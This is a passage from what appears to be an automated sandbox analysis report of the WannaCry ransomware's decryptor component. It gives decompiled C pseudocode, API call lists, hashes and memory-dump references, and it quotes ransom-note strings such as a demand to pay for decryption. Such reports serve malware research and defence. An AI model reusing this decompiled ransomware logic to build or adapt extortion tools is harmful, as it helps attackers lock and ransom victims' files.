                                                      0x0041324a
                                                      0x0041324b
                                                      0x0041324c
                                                      0x00413253

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                                      • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}








                                                      0x00404281
                                                      0x00404289
                                                      0x0040428b
                                                      0x0040428b
                                                      0x00404297
                                                      0x0040429e
                                                      0x004042fd
                                                      0x004042ff
                                                      0x00404306
                                                      0x004042a0
                                                      0x004042a0
                                                      0x004042a3
                                                      0x004042a5
                                                      0x004042ac
                                                      0x004042b3
                                                      0x004042f7
                                                      0x00000000
                                                      0x004042b5
                                                      0x004042bb
                                                      0x004042c1
                                                      0x004042c2
                                                      0x004042d5
                                                      0x004042dd
                                                      0x004042e4
                                                      0x004042e4
                                                      0x004042b3

                                                      APIs
                                                      • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                                      • GetParent.USER32(?), ref: 004042BB
                                                      • #2864.MFC42(00000000), ref: 004042C2
                                                      • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                                      • #2379.MFC42 ref: 004042DD
                                                        • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                                        • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                        • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                        • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                        • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                                      • #2379.MFC42(?), ref: 004042FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                                      • String ID: mailto:$open
                                                      • API String ID: 1144735033-2326261162
                                                      • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                                      • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301stringsleepCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210;
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t199 =  *((intOrPtr*)(_t116 + 1));
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											 *((intOrPtr*)( *( *0x422210) + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8);
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}




















































                                                      0x0040baf6
                                                      0x0040baf8
                                                      0x0040bafd
                                                      0x0040bafe
                                                      0x0040bb05
                                                      0x0040bb0f
                                                      0x0040bb16
                                                      0x0040bdf5
                                                      0x0040bdf5
                                                      0x0040bdf5
                                                      0x0040bb1c
                                                      0x0040bb1c
                                                      0x0040bb24
                                                      0x0040bb31
                                                      0x0040bb35
                                                      0x0040bb36
                                                      0x0040bb4d
                                                      0x0040bb51
                                                      0x0040bb53
                                                      0x0040bb62
                                                      0x0040bb66
                                                      0x0040bb7d
                                                      0x0040bb7f
                                                      0x0040bb8a
                                                      0x0040bb8e
                                                      0x0040bb95
                                                      0x0040bb9f
                                                      0x0040bb9f
                                                      0x0040bba1
                                                      0x0040bbae
                                                      0x0040bbb0
                                                      0x0040bbb5
                                                      0x0040bbb7
                                                      0x0040bbbb
                                                      0x0040bbbb
                                                      0x0040bbbd
                                                      0x0040bbc0
                                                      0x0040bbc4
                                                      0x0040bbc8
                                                      0x0040bbcc
                                                      0x0040bbd8
                                                      0x0040bbdd
                                                      0x0040bbde
                                                      0x0040bbe3
                                                      0x0040bbfb
                                                      0x0040bc03
                                                      0x0040bc0a
                                                      0x0040bc0e
                                                      0x0040bc16
                                                      0x0040bc16
                                                      0x0040bc27
                                                      0x0040bc29
                                                      0x0040bc2c
                                                      0x0040bbbb
                                                      0x0040bc3a
                                                      0x0040bc3e
                                                      0x0040bc3f
                                                      0x0040bc7e
                                                      0x0040bc85
                                                      0x0040bc86
                                                      0x0040bc8b
                                                      0x0040bc90
                                                      0x00000000
                                                      0x0040bc92
                                                      0x0040bc9c
                                                      0x0040bc9e
                                                      0x0040bca8
                                                      0x0040bcb0
                                                      0x0040bcb3
                                                      0x0040bcb3
                                                      0x0040bcb7
                                                      0x0040bcc5
                                                      0x0040bcc5
                                                      0x0040bcd3
                                                      0x0040bcdc
                                                      0x0040bcdd
                                                      0x0040bce2
                                                      0x0040bce5
                                                      0x0040bce5
                                                      0x0040bc41
                                                      0x0040bc41
                                                      0x0040bc48
                                                      0x0040bc4d
                                                      0x0040bc4d
                                                      0x0040bc51
                                                      0x0040bc55
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc59
                                                      0x0040bc71
                                                      0x0040bc71
                                                      0x0040bc5b
                                                      0x0040bc5b
                                                      0x0040bc61
                                                      0x0040bc65
                                                      0x00000000
                                                      0x0040bc67
                                                      0x0040bc67
                                                      0x0040bc6a
                                                      0x0040bc6f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc6f
                                                      0x0040bc65
                                                      0x0040bc7a
                                                      0x0040bc7a
                                                      0x0040bc7c
                                                      0x0040bcec
                                                      0x0040bcf3
                                                      0x0040bcf8
                                                      0x0040bcfc
                                                      0x0040bcff
                                                      0x0040bd01
                                                      0x0040bdc7
                                                      0x0040bdcb
                                                      0x0040bde3
                                                      0x0040bdec
                                                      0x0040bded
                                                      0x0040bdf2
                                                      0x00000000
                                                      0x0040bd07
                                                      0x0040bd07
                                                      0x0040bd10
                                                      0x0040bd16
                                                      0x0040bd18
                                                      0x0040bd1a
                                                      0x0040bd1c
                                                      0x0040bd1e
                                                      0x0040bd1e
                                                      0x0040bd20
                                                      0x0040bd20
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd23
                                                      0x0040bd20
                                                      0x0040bd26
                                                      0x0040bd28
                                                      0x0040bd2a
                                                      0x0040bd2c
                                                      0x0040bd2c
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2f
                                                      0x0040bd2c
                                                      0x0040bd32
                                                      0x0040bd35
                                                      0x0040bd35
                                                      0x0040bd38
                                                      0x0040bd3a
                                                      0x0040bd3c
                                                      0x0040bd3c
                                                      0x0040bd4c
                                                      0x0040bd4e
                                                      0x0040bd54
                                                      0x0040bd58
                                                      0x0040bd62
                                                      0x0040bd62
                                                      0x0040bd64
                                                      0x0040bd68
                                                      0x0040bd69
                                                      0x0040bd6e
                                                      0x0040bd71
                                                      0x0040bd73
                                                      0x0040be1a
                                                      0x0040be25
                                                      0x0040be27
                                                      0x0040be2d
                                                      0x0040be34
                                                      0x0040be37
                                                      0x0040be3e
                                                      0x0040be3e
                                                      0x0040be40
                                                      0x0040be44
                                                      0x0040be46
                                                      0x0040be48
                                                      0x0040be4c
                                                      0x0040be4e
                                                      0x0040be52
                                                      0x0040be6a
                                                      0x0040be6f
                                                      0x0040be6f
                                                      0x0040be4e
                                                      0x0040be79
                                                      0x0040be7a
                                                      0x0040be7f
                                                      0x0040be82
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bd79
                                                      0x0040bd81
                                                      0x0040bd8c
                                                      0x0040bd94
                                                      0x0040bd96
                                                      0x0040bd99
                                                      0x0040bd9e
                                                      0x0040bd9f
                                                      0x0040bda8
                                                      0x0040bdb1
                                                      0x0040bdb5
                                                      0x0040bdbb
                                                      0x0040bdbf
                                                      0x0040bdbf
                                                      0x00000000
                                                      0x0040bd07
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bc7c
                                                      0x0040bc75
                                                      0x0040bc77
                                                      0x00000000
                                                      0x0040bc77
                                                      0x0040bb38
                                                      0x0040bb38
                                                      0x0040bb3d
                                                      0x0040bb42
                                                      0x0040bb47
                                                      0x00000000
                                                      0x00000000
                                                      0x0040bb47
                                                      0x0040bb36
                                                      0x0040bdf8
                                                      0x0040be03
                                                      0x0040be10

                                                      APIs
                                                      • strtok.MSVCRT ref: 0040BBA9
                                                      • strtok.MSVCRT ref: 0040BC22
                                                      • #825.MFC42(?,?), ref: 0040BCDD
                                                      • GetTickCount.KERNEL32 ref: 0040BCEC
                                                      • srand.MSVCRT ref: 0040BCF3
                                                      • rand.MSVCRT ref: 0040BD09
                                                      • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                                      • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                                      • #825.MFC42(?,?,?,?), ref: 0040BDED
                                                        • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                                      • #825.MFC42(?), ref: 0040BE7A
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$strtok$CountSleepTickrandsrand
                                                      • String ID:
                                                      • API String ID: 1749417438-0
                                                      • Opcode ID: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                                      • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                                      • Opcode Fuzzy Hash: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                                      • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}















                                                      0x004038f6
                                                      0x004038f8
                                                      0x004038fd
                                                      0x004038fe
                                                      0x00403905
                                                      0x0040390d
                                                      0x00403911
                                                      0x0040392c
                                                      0x00403931
                                                      0x00403948
                                                      0x0040394d
                                                      0x0040394f
                                                      0x00403953
                                                      0x00403953
                                                      0x0040395c
                                                      0x0040396f
                                                      0x0040397a
                                                      0x00403980
                                                      0x0040399a
                                                      0x004039b6
                                                      0x004039bb
                                                      0x004039bd
                                                      0x004039bf
                                                      0x004039c1
                                                      0x004039c3
                                                      0x00000000
                                                      0x004039c3
                                                      0x0040399c
                                                      0x004039a1
                                                      0x004039a3
                                                      0x004039a5
                                                      0x004039a7
                                                      0x004039c8
                                                      0x004039c8
                                                      0x004039c8
                                                      0x004039a1
                                                      0x004039d1
                                                      0x004039dc
                                                      0x004039dc
                                                      0x004039e5
                                                      0x004039f1
                                                      0x004039fe
                                                      0x00403a0a
                                                      0x00403a17

                                                      APIs
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                                      • sprintf.MSVCRT ref: 0040397A
                                                      • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                                        • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                                        • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                                        • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                        • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                                      Strings
                                                      • %08X.dky, xrefs: 00403969
                                                      • All your files have been decrypted!, xrefs: 004039C3
                                                      • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                                      • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                                      • API String ID: 139182656-2046724789
                                                      • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                                      • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}









                                                      0x00404090
                                                      0x00404092
                                                      0x00404097
                                                      0x0040409d
                                                      0x0040409e
                                                      0x004040a5
                                                      0x004040a9
                                                      0x004040ac
                                                      0x004040b0
                                                      0x004040b5
                                                      0x004040c2
